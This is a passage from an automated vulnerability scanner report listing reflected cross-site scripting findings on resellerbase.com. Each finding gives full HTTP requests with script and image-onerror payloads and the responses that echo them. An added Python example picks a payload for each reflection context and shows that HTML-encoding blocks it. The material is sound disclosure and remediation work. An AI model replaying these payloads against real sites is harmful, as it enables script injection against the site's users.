Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain18c5c<img src=a onerror=alert(1)>f337ab86790]</td>
...[SNIP]...

2.4231. http://www.resellerbase.com/tag/domain [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1860<img%20src%3da%20onerror%3dalert(1)>1d510a546a8242223 was submitted in the REST URL parameter 2. This input was echoed as d1860<img src=a onerror=alert(1)>1d510a546a8242223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domaind1860<img%20src%3da%20onerror%3dalert(1)>1d510a546a8242223?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domaind1860<img src=a onerror=alert(1)>1d510a546a8242223]</td>
...[SNIP]...

2.4232. http://www.resellerbase.com/tag/domain [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 69828</title><img%20src%3da%20onerror%3dalert(1)>56be76df34300d0f was submitted in the REST URL parameter 2. This input was echoed as 69828</title><img src=a onerror=alert(1)>56be76df34300d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Because browsers treat the content of the TITLE element as raw text, a tag injected there on its own would not be parsed as markup; the payload therefore first closes the TITLE element with </title> and only then injects the IMG tag, whose onerror handler runs as soon as the browser fails to load the src.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain69828</title><img%20src%3da%20onerror%3dalert(1)>56be76df34300d0f?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain69828</title><img src=a onerror=alert(1)>56be76df34300d0f</title>
...[SNIP]...
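The two reflection points in this report behave differently: the tbl_caption cell reflects the tag name between ordinary tags, where a bare <img onerror> fires, while the TITLE reflection needs a </title> prefix first. The following script is an added example and is not part of the scanner report or of the resellerbase.com code base. It classifies where a marker lands in an HTML response, derives the payload shape for that context, and shows that HTML-encoding the reflected value (the equivalent of PHP's htmlspecialchars before output) neutralises both cases. The page templates, the CANARY marker and the render() function are constructed stand-ins for the application's output code, not captured traffic.

```python
"""Added example: classify the reflection context of a marker in an HTML
response, derive the payload that executes there, and check the encoded fix.
Page templates below are constructed to mirror the report's snippets."""
import html
import re

CANARY = "zq9k7"   # hypothetical marker; the scanner used random hex strings

# Elements whose content the HTML parser treats as raw text (RCDATA/raw text):
# a tag injected inside them is inert until the element is closed.
RAW_TEXT_ELEMENTS = {"title", "textarea", "script", "style"}

# Void elements never get a closing tag, so they must not stay on the stack.
VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "param", "source", "track", "wbr"}

TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*?(/?)>")


def reflection_context(body, canary):
    """Locate `canary` in `body` and return (kind, element) for the innermost
    open element around it: kind is 'rawtext' for title/textarea/script/style
    and 'text' otherwise. Returns None if the canary is not reflected at all."""
    idx = body.find(canary)
    if idx == -1:
        return None
    stack = []
    for closing, name, self_closing in TAG_RE.findall(body[:idx]):
        name = name.lower()
        if closing:
            if name in stack:                 # pop up to and including the match
                while stack.pop() != name:
                    pass
        elif not self_closing and name not in VOID_ELEMENTS:
            stack.append(name)
    element = stack[-1] if stack else None
    kind = "rawtext" if element in RAW_TEXT_ELEMENTS else "text"
    return kind, element


def payload_for(context, js="alert(1)"):
    """Smallest tag-based payload for the context: a bare <img onerror> between
    ordinary tags, or the same tag preceded by a close tag inside raw-text elements."""
    if context is None:
        return None
    kind, element = context
    tag = f"<img src=a onerror={js}>"
    return f"</{element}>{tag}" if kind == "rawtext" else tag


def reflected_unencoded(body, payload):
    """True when the payload appears verbatim, i.e. the browser will parse it as markup."""
    return payload in body


def render(template, tag_value, escape):
    """Stand-in for the application's server-side output of the tag name.
    escape=False reproduces the reported behaviour; escape=True is the fix
    (what PHP's htmlspecialchars($tag, ENT_QUOTES) would do before output)."""
    out = html.escape(tag_value, quote=True) if escape else tag_value
    return template.replace("{tag}", out)


# Constructed page templates modelled on the two reflection points in the report.
TITLE_PAGE = "<html><head><title>Browse by Tag: {tag}</title></head><body></body></html>"
CAPTION_PAGE = ('<html><head><title>Browse by Tag</title></head><body><table><tr>'
                '<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : {tag}]</td>'
                '</tr></table></body></html>')


def probe(template):
    """Full cycle: reflect the canary, classify the context, build the matching
    payload, then compare the vulnerable and the encoded rendering.
    Returns (context, payload, fires_unescaped, fires_escaped)."""
    context = reflection_context(render(template, CANARY, escape=False), CANARY)
    payload = payload_for(context)
    tainted = CANARY + payload
    vulnerable = render(template, tainted, escape=False)
    hardened = render(template, tainted, escape=True)
    return (context, payload,
            reflected_unencoded(vulnerable, payload),
            reflected_unencoded(hardened, payload))


if __name__ == "__main__":
    for name, page in (("title", TITLE_PAGE), ("caption", CAPTION_PAGE)):
        print(name, probe(page))
```

Run against the two constructed templates, probe() picks "</title><img src=a onerror=alert(1)>" for the TITLE page and the bare IMG tag for the caption cell, reports both as reflected verbatim in the unescaped rendering, and reports neither once the value is HTML-encoded. The context walk is deliberately simple (no handling of comments or of ">" inside attribute values); for real responses an HTML parser is the safer choice, but the decision it makes, close the raw-text element first or not, is the one that separates the two groups of findings above.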

2.4233. http://www.resellerbase.com/tag/domain [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ed97e</title><img%20src%3da%20onerror%3dalert(1)>c4a31f3c478 was submitted in the REST URL parameter 2. This input was echoed as ed97e</title><img src=a onerror=alert(1)>c4a31f3c478 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domained97e</title><img%20src%3da%20onerror%3dalert(1)>c4a31f3c478 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domained97e</title><img src=a onerror=alert(1)>c4a31f3c478</title>
...[SNIP]...

2.4234. http://www.resellerbase.com/tag/domain+name [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5e19<script>alert(1)</script>58066d15143a843c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagc5e19<script>alert(1)</script>58066d15143a843c4/domain+name?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc5e19<script>alert(1)</script>58066d15143a843c4/domain+name?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4235. http://www.resellerbase.com/tag/domain+name [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c42d6<script>alert(1)</script>7df44f2fd6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc42d6<script>alert(1)</script>7df44f2fd6c/domain+name HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc42d6<script>alert(1)</script>7df44f2fd6c/domain+name was not found on this server.</p>
...[SNIP]...

2.4236. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bc8f7</title><img%20src%3da%20onerror%3dalert(1)>9385b6c8934e2123 was submitted in the REST URL parameter 2. This input was echoed as bc8f7</title><img src=a onerror=alert(1)>9385b6c8934e2123 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+namebc8f7</title><img%20src%3da%20onerror%3dalert(1)>9385b6c8934e2123?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain namebc8f7</title><img src=a onerror=alert(1)>9385b6c8934e2123</title>
...[SNIP]...

2.4237. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7c36c</title><img%20src%3da%20onerror%3dalert(1)>35094792377 was submitted in the REST URL parameter 2. This input was echoed as 7c36c</title><img src=a onerror=alert(1)>35094792377 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+name7c36c</title><img%20src%3da%20onerror%3dalert(1)>35094792377 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain name7c36c</title><img src=a onerror=alert(1)>35094792377</title>
...[SNIP]...

2.4238. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd6c3<img%20src%3da%20onerror%3dalert(1)>b0d39c0994e was submitted in the REST URL parameter 2. This input was echoed as cd6c3<img src=a onerror=alert(1)>b0d39c0994e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+namecd6c3<img%20src%3da%20onerror%3dalert(1)>b0d39c0994e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain namecd6c3<img src=a onerror=alert(1)>b0d39c0994e]</td>
...[SNIP]...

2.4239. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17243<img%20src%3da%20onerror%3dalert(1)>86febc641df69cf16 was submitted in the REST URL parameter 2. This input was echoed as 17243<img src=a onerror=alert(1)>86febc641df69cf16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+name17243<img%20src%3da%20onerror%3dalert(1)>86febc641df69cf16?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain name17243<img src=a onerror=alert(1)>86febc641df69cf16]</td>
...[SNIP]...

2.4240. http://www.resellerbase.com/tag/domain+names [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc8d2<script>alert(1)</script>8775039357c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagbc8d2<script>alert(1)</script>8775039357c/domain+names HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagbc8d2<script>alert(1)</script>8775039357c/domain+names was not found on this server.</p>
...[SNIP]...

2.4241. http://www.resellerbase.com/tag/domain+names [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9e89<script>alert(1)</script>bd99e59cad58d4767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd9e89<script>alert(1)</script>bd99e59cad58d4767/domain+names?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd9e89<script>alert(1)</script>bd99e59cad58d4767/domain+names?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4242. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d7fb3</title><img%20src%3da%20onerror%3dalert(1)>6ee2bfa9c03a46bb2 was submitted in the REST URL parameter 2. This input was echoed as d7fb3</title><img src=a onerror=alert(1)>6ee2bfa9c03a46bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+namesd7fb3</title><img%20src%3da%20onerror%3dalert(1)>6ee2bfa9c03a46bb2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain namesd7fb3</title><img src=a onerror=alert(1)>6ee2bfa9c03a46bb2</title>
...[SNIP]...

2.4243. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b1d85</title><img%20src%3da%20onerror%3dalert(1)>835b97560d1 was submitted in the REST URL parameter 2. This input was echoed as b1d85</title><img src=a onerror=alert(1)>835b97560d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+namesb1d85</title><img%20src%3da%20onerror%3dalert(1)>835b97560d1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain namesb1d85</title><img src=a onerror=alert(1)>835b97560d1</title>
...[SNIP]...

2.4244. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac8b2<img%20src%3da%20onerror%3dalert(1)>8ed4ae53cda was submitted in the REST URL parameter 2. This input was echoed as ac8b2<img src=a onerror=alert(1)>8ed4ae53cda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+namesac8b2<img%20src%3da%20onerror%3dalert(1)>8ed4ae53cda HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain namesac8b2<img src=a onerror=alert(1)>8ed4ae53cda]</td>
...[SNIP]...

2.4245. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25ebc<img%20src%3da%20onerror%3dalert(1)>115a8b38d8442b0a1 was submitted in the REST URL parameter 2. This input was echoed as 25ebc<img src=a onerror=alert(1)>115a8b38d8442b0a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+names25ebc<img%20src%3da%20onerror%3dalert(1)>115a8b38d8442b0a1?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
